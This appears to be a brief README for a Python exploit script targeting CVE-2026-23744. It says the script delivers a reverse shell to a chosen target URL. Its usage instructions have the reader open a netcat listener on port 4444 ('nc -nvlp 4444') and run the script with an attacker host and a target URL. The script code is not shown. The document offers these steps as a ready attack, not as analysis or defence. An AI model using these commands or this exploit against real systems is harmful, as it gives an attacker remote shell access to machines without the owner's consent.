
Python exploit script for CVE-2026-23744 that delivers a reverse shell to a specified target URL, requiring a netcat listener for command-and-control.
python script for exploiting CVE-2026-23744
how to use it : first thing you should open two terminals
frist terminal --> nc -nvlp 4444
second terminal --> python CVE-2026-23744.py -lhost your ip -url target url
for help menu : python CVE-2026-23744.py -h